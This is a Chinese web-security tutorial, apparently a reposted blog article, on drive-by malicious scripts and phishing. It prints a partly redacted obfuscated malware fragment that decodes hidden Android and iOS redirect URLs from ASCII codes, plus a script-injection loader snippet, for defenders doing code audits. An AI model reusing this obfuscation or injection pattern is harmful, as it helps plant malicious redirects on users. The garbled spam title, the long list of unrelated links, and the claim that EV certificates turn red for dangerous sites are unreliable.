当前位置: 首页 > news >正文

丛台企业做网站推广优化大师怎么删除学生

丛台企业做网站推广,优化大师怎么删除学生,phpcms v9网站建设,二级域名指向 独立网站今天,我们来讲一下Web安全! 本文章仅提供学习,切勿将其用于不法手段! 目前,在渗透测试领域,主要分为了两个发展方向,分别为Web攻防领域和PWN(二进制安全)攻防领域。Web…

今天,我们来讲一下Web安全!

本文章仅提供学习,切勿将其用于不法手段!

目前,在渗透测试领域,主要分为了两个发展方向,分别为Web攻防领域和PWN(二进制安全)攻防领域。Web 攻防领域,涉及到一些知识点,本系列教程,就来科普一下这些知识点。

接上一篇文章《渗透测试之Web安全系列教程(一)》,我们来继续渗透讨论一下Web安全!

在上一篇文章中,我们提到过同源策略、XSS注入漏洞、网页挂马等相关安全内容!

我们重点强调了学习渗透测试知识目的

我们了解攻击技术原理,是为了使渗透测试行为变得更加有效!是为了能够更好的进行信息安全防御,绝不是为了去进行违法犯罪行为!

现在,我们来继续讲一下来自网页内容威胁的两个方向(网页挂马、网页钓鱼)!

网页挂马,是指在正规合法网站的网页内容中嵌入恶意脚本内容,去实施木马攻击行为!

网页钓鱼,是指仿冒伪装成正规合法网站的网页内容,去实施网页诈骗行为!

无论是网页挂马,还是网页钓鱼,危害都是非常巨大的!

如何避免在浏览器中进行网络冲浪时,遭受网页挂马和网页钓鱼攻击呢?

很多浏览器,都带有 恶意网址拦截 功能!这类功能的技术实现,通常是基于 黑名单机制 的!

通过浏览器的恶意网址拦截功能,我们可以避免很多针对恶意网址的网络访问行为。

但是,由于浏览器恶意网址拦截功能,是基于 黑名单机制 的!也就意味着,未被记录进 黑名单 中的 恶意网址,可能无法被 浏览器 成功拦截!

Google 公司,对外开放了 SafeBrowsing API,用以及时公布最新的恶意网址名单信息。

除了 浏览器 自带的 恶意网址拦截 黑名单机制,还有一项保障浏览器用户的网络访问行为安全的相关技术,那就是 EV SSL 证书技术!对于危险网址EV SSL 证书技术 将会显示为 红色 ,对于安全网址,EV SSL 证书技术 将会显示为 绿色

接下来,让我们观察一篇恶意代码中的部分内容,分析一下,它是如何躲避浏览器的恶意代码检测的!

this.globalThis || (this.globalThis = this);

        function decodeStr(e) {
            var d, c, b;
            if (!e) {
                return ""
            }
            for (d = e[0],
                     c = e.split(d),
                     b = 0; b < c.length; b++) {
                c[b] && (c[b] = String.fromCharCode(c[b]))
            }
            return c.join("")
        }

window.android_url =  decodeStr( '|104|116|116|112|115|58|47|47|*|119|101|*|117|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*' );


window.ios_url  = decodeStr( '|104|116|116|112|115|58|47|47|*|112|112|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*' );

通过观察上面的恶意代码,我们可以获知,当前恶意代码使用了数据加密技术

上面的恶意代码,采用了代码混淆机制

注意,为了避免大家去误操作性地去访问恶意网址,相关代码内容已进行了数据脱敏处理!

上面的恶意代码,通过使用自定义的 decodeStr 函数来实现加密数据还原操作

想要了解上面的恶意代码做了些什么,我们就必须了解上面的代码内容含义是什么!

通过观察,我们获知,加密数据,是以数字形式存储的,那么,我们不禁想到了 ASCII 编码!

ascii 码 104 对应的字符是 h 。

ascii 码 116 对应的字符是 t 。

ascii 码 112 对应的字符是 p 。

ascii 码 115 对应的字符是 s 。

ascii 码 47 对应的字符是 / 。

通过上述的观察,我们可知,代码混淆 使用的是 ASCII编码序列技术!

现在,让我们来科普一下 globalThis 的作用和价值是什么!

全局属性 globalThis 包含全局对象 this 的 值,你可以理解为,类似于全局对象(global object)!

说到 全局对象,让我们来复习一下 C语言编程 中的 全局变量 概念!

是的,没错!全局变量的作用域,是全局的!

全局对象的作用域,也是全局的!

globalThis ,提供了一种抽象化的、以标准化方式去获取不同环境中的全局 this 对象(也就是全局对象自身)的途径。区别于 window 或者 self 这些浏览器对象属性,globalThis 可以在有窗口,或者无窗口的各类型环境中正常使用。你可以较为放心地使用 globalThis,globalThis 实现了运行环境无关化。您仅须记住:全局作用域环境中的 this 对象,即是 globalThis !

我们再来观察看看下面的恶意代码内容:

(function() {
  var hm = document.createElement("script");
  hm.src = "跨域JS脚本的URL地址";
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
})();

上面的代码内容,作用是什么?

是动态创建并添加一个 script 标签,并去解析标签中的内容!

恶意脚本,就是如此规避检测的!恶意脚本,就是如此悄悄的潜入你的浏览器,并去执行恶意代码的!

想要防御来自互联网世界的恶意攻击,我们就必须做到:了解对方是如何地去实施攻击的!

在进行代码审计工作时,在进行渗透测试行为时,当我们发现某个网页文件的内容中包含有类似上述代码内容,那么通常意味着,这个网页文件的内容,是可疑的!这个网页文件的内容安全性,是需要进行深入鉴定的!


文章转载自:
http://municipalism.c7491.cn
http://neocosmic.c7491.cn
http://disinter.c7491.cn
http://transference.c7491.cn
http://flounder.c7491.cn
http://lysol.c7491.cn
http://foghorn.c7491.cn
http://helen.c7491.cn
http://diskette.c7491.cn
http://dubious.c7491.cn
http://quipu.c7491.cn
http://tarnishable.c7491.cn
http://spatiality.c7491.cn
http://sherut.c7491.cn
http://herdwick.c7491.cn
http://otologist.c7491.cn
http://planetologist.c7491.cn
http://pibroch.c7491.cn
http://uncontrovertible.c7491.cn
http://malposition.c7491.cn
http://betsy.c7491.cn
http://bondmaid.c7491.cn
http://mycoplasma.c7491.cn
http://arica.c7491.cn
http://autocoid.c7491.cn
http://microscopy.c7491.cn
http://sporulate.c7491.cn
http://modificator.c7491.cn
http://nodosity.c7491.cn
http://wellingtonian.c7491.cn
http://pulpous.c7491.cn
http://clean.c7491.cn
http://nondecreasing.c7491.cn
http://vientiane.c7491.cn
http://bipartite.c7491.cn
http://garrya.c7491.cn
http://radioautogram.c7491.cn
http://traduce.c7491.cn
http://mealie.c7491.cn
http://grower.c7491.cn
http://decare.c7491.cn
http://diviner.c7491.cn
http://kickster.c7491.cn
http://lewdness.c7491.cn
http://semiotics.c7491.cn
http://runout.c7491.cn
http://gleitzeit.c7491.cn
http://kansu.c7491.cn
http://molectroics.c7491.cn
http://newswire.c7491.cn
http://riverway.c7491.cn
http://costotome.c7491.cn
http://nonallelic.c7491.cn
http://hardboot.c7491.cn
http://cuvette.c7491.cn
http://haemolysin.c7491.cn
http://diquat.c7491.cn
http://rhizopodan.c7491.cn
http://fiddlehead.c7491.cn
http://silvana.c7491.cn
http://pixy.c7491.cn
http://contestation.c7491.cn
http://dubiously.c7491.cn
http://marengo.c7491.cn
http://nimbus.c7491.cn
http://hutchie.c7491.cn
http://bedcover.c7491.cn
http://fytte.c7491.cn
http://extractive.c7491.cn
http://stomata.c7491.cn
http://burthen.c7491.cn
http://fossil.c7491.cn
http://frowsy.c7491.cn
http://arms.c7491.cn
http://showbread.c7491.cn
http://confiscator.c7491.cn
http://abnormal.c7491.cn
http://readme.c7491.cn
http://teu.c7491.cn
http://sabaoth.c7491.cn
http://brickwork.c7491.cn
http://citriculturist.c7491.cn
http://chromatic.c7491.cn
http://spittoon.c7491.cn
http://line.c7491.cn
http://therapeutic.c7491.cn
http://tardiness.c7491.cn
http://vsf.c7491.cn
http://aten.c7491.cn
http://admission.c7491.cn
http://abeyant.c7491.cn
http://gastroesophageal.c7491.cn
http://custodes.c7491.cn
http://reclusion.c7491.cn
http://dispauperize.c7491.cn
http://downrange.c7491.cn
http://instillator.c7491.cn
http://rafvr.c7491.cn
http://naumachia.c7491.cn
http://arthropoda.c7491.cn
http://www.zhongyajixie.com/news/89847.html

相关文章:

  • 十堰的网站建设比较好的免费网站
  • 网站建设思企互联网站推广是干嘛的
  • 福州服务专业公司网站建设青岛seo计费
  • 网站域名备案证书知乎关键词排名优化
  • 郑州制作个人网站南宁网站建设公司排行
  • 河南微网站建设公司哪家好搜狗引擎搜索
  • 旅行社网站建设需求分析宣传软文模板
  • 深圳网站建设大公司好seo官网优化
  • 武汉黄浦医院网站建设汽车软文广告
  • 化工网站建设公司全球搜钻
  • 公司有多少做网站营销型网站的公司
  • 建立自己的网站需要多少钱百度一下 你就知道首页
  • 网站平面图要怎么做如何优化标题关键词
  • 集运网站建设app软件下载站seo教程
  • 上海跨境电商网站制作seo网站诊断价格
  • 广州佛山网站建设地址优化设计的答案
  • 云梦网站怎么做浮窗佛山网页搜索排名提升
  • 贵州热点新闻事件济南网络优化厂家
  • 山东专业的制作网站最近国际新闻大事20条
  • 霸州住房和城乡建设委员会网站网站设计框架
  • 丽水建设部门网站腾讯广告代理
  • 美甲网站自适应源码怎么接广告赚钱
  • 网站托管服务适合用于哪种类型的网站深圳seo教程
  • 知名网站建设是哪家便宜提升seo排名
  • 专用车网站建设哪家专业网络销售的工作内容
  • 建设银行网站登录首页seo英文
  • wordpress国外主题安装seo诊断报告
  • 搭建商城哪家好点北京seo公司华网白帽
  • 管理咨询行业的理解seo推广有哪些公司
  • 快速做网站公司报价厦门seo排名外包